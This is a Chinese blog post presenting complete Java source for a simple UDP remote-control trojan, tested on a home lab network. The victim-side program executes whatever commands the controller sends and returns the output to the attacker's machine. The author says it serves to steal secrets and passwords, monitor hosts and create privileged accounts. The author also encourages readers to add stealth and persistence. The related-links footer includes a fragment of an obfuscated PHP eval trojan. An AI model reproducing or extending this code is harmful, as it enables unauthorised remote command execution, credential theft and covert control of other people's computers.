Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)

最新推荐文章于 2024-06-11 16:38:56 发布
最新推荐文章于 2024-06-11 16:38:56 发布
阅读量1.9k 收藏 20
点赞数 3
分类专栏: Java 安全 文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47034674/article/details/110205544
版权

闲来无事,想着利用套接字和exec()这个方法调用cmd命令并将结果通过套接字反馈到黑客电脑上,将结果写入一个文件便于以后分析。(比如窃取目标机密信息、密码、监控对方主机、查看对方CPU、内存信息,另外就是新建用户并提权便于黑客后面登陆)
开发环境:IntelljIDEA 2020+JDK1.8
Win10主机(ip:192.168.1.106)和Win7虚拟机(ip:192.168.1.107)上测试
代码如下:
黑客端:(套接字的客户端)

package UDP;
import java.io.IOException;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.util.Scanner;
import java.io.*;
public class hack {
    public static void main(String[] args) throws IOException {
        while(true) {
            DatagramSocket ds = new DatagramSocket();
            Scanner input=new Scanner(System.in);
            System.out.println("请输入要执行的命令");
            String str = input.nextLine();
            byte[] bytes = str.getBytes();
            InetAddress ip = InetAddress.getByName("192.168.1.107");
            DatagramPacket dp = new DatagramPacket(bytes, bytes.length, ip, 9999);
            ds.send(dp);
            byte[] bytes2=new byte[4096];
            ds.close();
            DatagramSocket ds2=new DatagramSocket(8888);
            DatagramPacket dp2=new DatagramPacket(bytes2,bytes2.length);
            ds2.receive(dp2);
            byte[] bytes3=dp2.getData();
            int leng=dp2.getLength();
            File f=new File("D:\\Trojan\\infomation\\infos");
            if(!f.exists()){
                f.createNewFile();
            }
            String info=new String(bytes3,0,leng,"gbk");
            FileWriter fw=new FileWriter(f,true);
            BufferedWriter bw=new BufferedWriter(fw);
            bw.write(info);
            bw.flush();
            bw.close();
            ds2.close();
        }
    }
}

被劫持主机(套接字服务端):

package UDP;
import java.io.IOException;
import java.io.InputStream;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
public class target {
    public static void main(String[] args) throws  IOException {
        while(true) {
            DatagramSocket ds = new DatagramSocket(9999);
            byte[] bytes = new byte[1024];
            DatagramPacket dp = new DatagramPacket(bytes, bytes.length);
            ds.receive(dp);
            byte[] bytes2 = dp.getData();
            int leng = dp.getLength();
            String command=new String(bytes2, 0, leng);
            Runtime rt=Runtime.getRuntime();
            Process pr=rt.exec(command);
            InputStream is=pr.getInputStream();
            byte[] bytes3=new byte[4096];
            while(is.read(bytes3,0,bytes3.length)!=-1){

            }
            ds.close();
            DatagramSocket ds2=new DatagramSocket();
            InetAddress ip=InetAddress.getByName("192.168.1.106");
           DatagramPacket dp2=new DatagramPacket(bytes3,bytes.length,ip,8888);
           ds2.send(dp2);
         ds2.close();
        }
    }
}

测试结果:
在这里插入图片描述
在这里插入图片描述
通过以上命令得到的数据也返回到了infos文件里面了。
在这里插入图片描述
更重要的,通过命令建立的hack用户并提权也成功在虚拟机上建立了。
在这里插入图片描述
虚拟机上的360还是比较灵的,刚输完命令运行马上报警:
在这里插入图片描述
在这里插入图片描述
点允许即可。
当然,这只是很Low很Low的一个木马,初具雏形而已。如何隐藏、定时启动、自动上传文件、修改注册表等等都未完成,感兴趣的朋友可以下去自行补充。。。。。

ChristopherIn
关注
  • 3
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
java木马_Java也能木马~(附源码!) | 学步园
weixin_35971653的博客
02-12 1368
这个小程序是很久以前的,现在发上来(仅供大家学习参考,不能用于任何非法行为~)木马定义:利用计算机程序漏洞侵入后窃取文件的程序程序被称为木马。它是一种具有隐藏性的、自发性的可被用来进行恶意行为的程序,多不会直接对电脑产生危害,而是以控制为主。当然我的这个没这么“强大”。。。首先讲下我的实现思路:主要通过Socket和ServerSocket之间传输数据。由于我没有自己的一个服务器(没有固定IP...
安全技术系列之Java一句话木马
好记性不如烂笔头
10-14 4313
安全技术系列文章
java木马
qq_58000413的博客
03-28 325
需要指定参数一:命令位置;参数二:-c表示先执行第一个参数;这里执行命令的主要用的是exec函数。执行cmd命令,输出whoami结果。
Java内存马 原理、实战与查杀】
weixin_46318447的博客
06-11 1431
内存马原理 、实战与查杀
java 木马开发(4)---服务端 ---接收指令函数takeOrder()
zkwniky的博客
01-28 809
本函数是核心函数,用来接收控制端自定义的命令,如果不符合自定义命令,则windows将会调用被控制端cmd,linux调用被控制端shell //不断的循环接收控制端传来的指令,并根据指令进行判断,到达不同的控制流     void takeOrder() {         while (true) {                          try {
java怎么编木马,实现简单木马免杀(示例代码)
weixin_39755890的博客
03-22 1117
今天所学的知识一共有以下几点:ms08-067漏洞复现ms10-046漏洞复现木马免杀前面几个漏洞复现就不详细说了,跟着步骤操作基本可以成功,主要说一下今天做的简单木马免杀,下面进入正题。木马免杀Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,我是使用的shellter免杀,做的不是很好,跟大家分享一下我的实验结果。原理:生成木马文件,然后将生成的木马文件与*...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
基于jQuery实现自动轮播旋转木马特效
11-26
通过以上步骤,一个基本的基于jQuery的自动轮播旋转木马特效就可以实现。开发者可以根据需求进一步定制样式和交互,增强用户体验。同时,jQuery社区提供了许多类似的插件,如Slick Carousel、Bootstrap Carousel等,...
基于机器学习的木马检测模型的设计与实现(论文)-kaic.docx
04-04
### 基于机器学习的木马检测模型的设计与实现 #### 1. 研究背景 随着互联网技术的快速发展以及人们对网络的高度依赖,网络安全问题变得日益严峻。特别是JavaScript木马,它作为一种隐蔽性强、危害大的恶意软件,对...
探索基于.NET下实现一句话木马之asmx篇1
08-03
【.NET下实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
java 木马编程_Java木马程序源码,仅供学习参考使用
weixin_36415835的博客
02-13 420
【实例简介】/** 本程序仅供学习参考使用。严禁使用本程序进行违法行为!* 本程序功能* 1、程序开机自动启动(√)* 2、自动发送邮件* 3、执行dos命令,并将信息返回、这里可以执行关机等命令(√)* 4、锁定鼠标,这里通过一个线程实现* 5、查看被控制端的桌面,将桌面画面截图并发送给控制端(√)* 6、在被控制端弹出对话框,多种对话框模式(√)* 7、让被控制端闪屏(√)* 本程序仅供学习参...
手把手简单制作一个 Java 木马程序
xmt1139057136的专栏
08-01 6994
你知道的越多,不知道的就越多,业余的像一棵小草!你来,我们一起精进!你不来,我和你的竞争对手一起精进!编辑:业余草juejin.cn/post/6990715558178062372推荐:...
java木马源码_用Java木马程序【附源代码下载】
weixin_39583521的博客
02-19 1401
Java木马程序是很久以前的,现在发出来(仅供大家学习参考,不得用于任何非法行为~)木马定义:利用计算机程序漏洞侵入后窃取文件的程序程序被称为木马。它是一种具有隐藏性的、自发性的可被用来进行恶意行为的程序,多不会直接对电脑产生危害,而是以控制为主。当然我的这个木马没这么“强大”。。。首先讲下我的实现思路:主要通过Socket和ServerSocket之间传输数据。由于我没有自己的一个服务...
Java -- 一句话木马
tryheart的博客
08-26 2335
Java调用计算机程序 import java.io.IOException; public class WebShell { public static void main(String[] args) throws IOException { Runtime.getRuntime().exec("calc"); } } 调用cmd命令 import java.io.IOException; import java.io.InputStream; import
udp攻击的PHP木马
sshack的专栏
10-21 2763
关于近期一些服务器遭受UDP攻击的说明<br />近来我有一两台服务器显示经常受到udp攻击<br />导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的<br />下面我想说一下被入侵的原理<br />用户程序中的一个php页面的原代码:<br /><?php<br />/*<br />gl<br /><br />*/<br />eval(gzinflate(base64_decode('DZN
java 木马开发(1)
zkwniky的博客
01-15 5278
曾经研究过一段时间的逆向、破解、木马病毒之类的,很多人说,Java不能木马,当时气不过,就一个简单的木马。最近一段时间有些闲,整理一些以前的代码,也是一个学习的过程。 现在将木马运行的效果贴一下,在以后的过程中,回分几部分将代码讲解清楚贴出来,希望大家多提宝贵意见。 服务端每隔5秒钟运行一次监听 =================================
Java木马(2)==服务端模块(判断操作系统)
zkwniky的博客
01-15 827
木马为直连木马,不通过第三方跳转。此处的概念不介绍过多。 概念介绍:服务端(被控制方运行的程序)               客户端(控制方运行的程序) 此处涉及到了System类,java的System类代表系统,涉及系统的很多属性和控制方法都在这个类里面。 system类中的成员方法和成员变量都是static的,成员方法getProperty()函数定义如下 public s
UDP协议的木马方法(Delphi
xiaofengtoo的专栏
12-31 194
UDP协议的木马方法(Delphi)   木马一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。 一、软硬件要求。 Windows95/98对等网,用来监视的计算机(以下简称主控机)和被监视的计算机(以下简称受控机)都必须装有TCP/IP 协议,并正确配置。如没有网络,也可以在一台计算机上进行调...
一个旋转木马自定义控件
06-07
好的,我可以给您提供一个简单的旋转木马自定义控件的实现。这个控件可以显示一组图片,并支持手势滑动和点击事件。以下是实现步骤: 1. 定义 CarouselItem 类,用于表示旋转木马中的每个项目。该类应该包含一个 ...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ChristopherIn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值